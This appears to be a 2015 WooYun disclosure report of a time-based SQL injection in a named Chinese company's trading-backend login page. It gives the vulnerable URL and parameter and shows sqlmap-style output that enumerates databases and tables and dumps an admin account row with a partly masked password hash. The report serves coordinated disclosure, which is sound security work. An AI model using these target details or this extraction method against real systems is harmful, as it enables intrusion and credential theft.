当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141629

漏洞标题:臭美网交易后台存在SQL注入(已获取管理员账号密码)

相关厂商:深圳市臭美文化传播有限公司

漏洞作者: 三浪兄

提交时间:2015-09-16 18:48

修复时间:2015-11-01 10:04

公开时间:2015-11-01 10:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

影响到上万商家!!!
.
.
.
.
.
(我猜的,你厂有上万商家吗???)

详细说明:

交易后台http://jiaoyi.choumei.cn/Login/index.html username存在延时注入。
管理员登陆密码hash值已打马。。。哦,码,勿扰。

漏洞证明:

available databases [3]:
[*] cm_choumeionline
[*] cm_service
[*] information_schema
1
[14:52:12] [INFO] adjusting time delay to 1 second due to good response times
61
[14:52:16] [INFO] retrieved: cm_activity
[14:53:15] [INFO] retrieved: cm_addedserv
[14:54:08] [ERROR] invalid character detected. retrying..
[14:54:08] [WARNING] increasing time delay to 2 seconds
ice
[14:54:31] [INFO] retrieved: cm_addedservice_itemtype
[14:56:36] [INFO] retrieved: cm_addedservice_salon
[14:58:02] [INFO] retrieved: cm_admin_user
[14:59:29] [INFO] retrieved: cm_bounty_activity
[15:02:01] [INFO] retrieved: cm_bounty_comment
[15:03:33] [INFO] retrieved: cm_bounty_friends
[15:05:00] [INFO] retrieved: cm_bounty_order
[15:06:11] [INFO] retrieved: cm_bounty_push
[15:07:18] [INFO] retrieved: cm_bounty_request
[15:08:44] [INFO] retrieved: cm_bounty_task
[15:09:44] [INFO] retrieved: cm_bounty_task_20150907182500
[15:12:32] [INFO] retrieved: cm_business_staf
[15:14:34] [INFO] adjusting time delay to 1 second due to good response times
f
[15:14:39] [INFO] retrieved: cm_category
[15:15:25] [INFO] retrieved: cm_city
[15:15:47] [INFO] retrieved: cm_collect
[15:16:27] [INFO] retrieved: cm_comment_filter
[15:17:41] [INFO] retrieved: cm_commission
[15:18:22] [INFO] retrieved: cm_commission_log
[15:19:04] [INFO] retrieved: cm_company_code
[15:20:02] [INFO] retrieved: cm_company_code_collect
[15:21:05] [INFO] retrieved: cm_company_code_user
[15:21:46] [INFO] retrieved: cm_country
[15:22:23] [INFO] retrieved: cm_coupon
[15:22:51] [INFO] retrieved: cm_coupon_config
[15:23:41] [INFO] retrieved: cm_coupon_info
[15:24:17] [INFO] retrieved: cm_coupon_iphone
[15:25:02] [INFO] retrieved: cm_coupon_order_ticket_temp
[15:26:51] [INFO] retrieved: cm_coupon_statics
[15:27:39] [INFO] retrieved: cm_coupon_temp
[15:28:16] [INFO] retrieved: cm_crm_logs
[15:29:02] [INFO] retrieved: cm_depart
[15:29:43] [ERROR] invalid character detected. retrying..
[15:29:43] [WARNING] increasing time delay to 2 seconds
ments
[15:30:33] [INFO] retrieved: cm_device
[15:31:19] [INFO] retrieved: cm_dispose_order
[15:33:24] [INFO] retrieved: cm_dividend
[15:34:32] [INFO] retrieved: cm_dividend_set
[15:35:37] [INFO] retrieved: cm_event_conf
[15:37:26] [INFO] retrieved: cm_eventbanner
Database: cm_choumeionline
Table: cm_admin_user
[15 columns]
+--------------+----------------------+
| Column | Type |
+--------------+----------------------+
| action_list | text |
| add_time | int(11) |
| agency_id | smallint(5) unsigned |
| ec_salt | varchar(10) |
| email | varchar(60) |
| lang_type | varchar(50) |
| last_ip | varchar(15) |
| last_login | int(11) |
| nav_list | text |
| password | varchar(32) |
| role_id | smallint(5) |
| suppliers_id | smallint(5) unsigned |
| todolist | longtext |
| user_id | smallint(5) unsigned |
| user_name | varchar(60) |
+———————+----------------------+
Database: cm_choumeionline
Table: cm_admin_user
[1 entry]
+----------------+----------------------------------+---------+-----------+
| email | password | user_id | user_name |
+----------------+----------------------------------+---------+-----------+
| faesf@fsaf.com | 258448ee1a31bb7eb223adc0f0******| 1 | choumei |
+----------------+----------------------------------+---------+-----------+

修复方案:

妈妈说,要过滤。

版权声明:转载请注明来源 三浪兄@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-17 10:02

厂商回复:

正在处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-17 17:29 | 三浪兄 ( 实习白帽子 | Rank:46 漏洞数:13 | I am a singer-songwriter.)

    厂商回应里是15rank,怎么实际给的只有4rank啊???